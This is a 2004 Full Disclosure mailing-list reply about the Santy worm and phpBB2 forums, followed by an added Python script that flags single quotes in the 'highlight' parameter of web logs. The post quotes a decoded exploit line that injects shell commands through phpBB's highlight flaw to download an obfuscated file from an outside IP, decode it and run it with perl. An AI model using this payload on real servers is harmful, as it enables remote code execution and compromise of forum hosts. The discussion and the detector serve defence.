Full Disclosure mailing list archives
RE: RE: Worm hitting PHPbb2 Forums
From: Paul Laudanski <zx () castlecops com>
Date: Thu, 23 Dec 2004 23:40:46 -0500 (EST)
On Thu, 23 Dec 2004, Patrick Nolan wrote:
A bot is not uploaded, not sure where that came from. And by now, it is not expected to be spreading at all, thanks to the interruption in search requests by Google.
There are a couple posts going on about this, for instance take this article:

http://www.cbronline.com/article_news.asp?guid=366C3494-1446-4A8B-973C-F67044266D35

[quote]
"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The exploit it uses is only able to transfer around 20 bytes of data at a time. So the worm transfers itself from one web site to another in small chunks."

"If a chunk gets missing, the worm might still work fine... or it might fail," Hypponen told ComputerWire. "More generations there are, more likely it is to fail because of this."
[/quote]

Compare that to an exploit that is posted @bugtraq:

http://www.securityfocus.com/archive/1/385208

(decoded)
[quote]
rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_ highlight='.passthru($HTTP_GET_VARS[rush]).'
[/quote]

It is making use of the highlight exploit in pre phpbb 2.0.11. Even though the 'worm' itself may be hindered, we can certainly expect script kiddies to attempt these manually.

http://www.modsecurity.org/blog/archives/000046.html

Now that is catching the single quote in the highlight argument.

--
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
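
The check mentioned at the end of the message above (a single quote in the highlight argument) can also be run over existing web server logs. The following is an added example, not part of the original post and not the ModSecurity rule it links to: it assumes Common Log Format request lines and also assumes the quote may arrive URL-encoded more than once (for example %2527), so values are decoded until stable. The log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (documentation IPs, harmless values).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Dec/2004:10:00:01 -0500] "GET /viewtopic.php?t=12&highlight=worm HTTP/1.1" 200 5120',
    '192.0.2.11 - - [23/Dec/2004:10:00:02 -0500] "GET /viewtopic.php?t=12&highlight=%2527.EXAMPLE.%2527 HTTP/1.1" 200 311',
    '192.0.2.12 - - [23/Dec/2004:10:00:03 -0500] "GET /viewtopic.php?t=7&highlight=%27x HTTP/1.1" 200 298',
    '192.0.2.13 - - [23/Dec/2004:10:00:04 -0500] "GET /index.php?q=it%27s HTTP/1.1" 200 900',
]

# Request field of a Common Log Format line (assumed log layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """URL-decode repeatedly until stable, so %2527 -> %27 -> ' is seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def highlight_values(url):
    """Yield the raw (still encoded) highlight= values from a request URL."""
    _, _, query = url.partition("?")
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if fully_decode(name).lower() == "highlight":
            yield raw

def suspicious_requests(lines):
    """Return (line_number, decoded_value) where highlight contains a quote."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        for raw in highlight_values(match.group(1)):
            decoded = fully_decode(raw)
            if "'" in decoded:
                hits.append((number, decoded))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: highlight={value!r}")
```

Only the highlight parameter is inspected, so the quote in the fourth constructed line (a different parameter) is not reported.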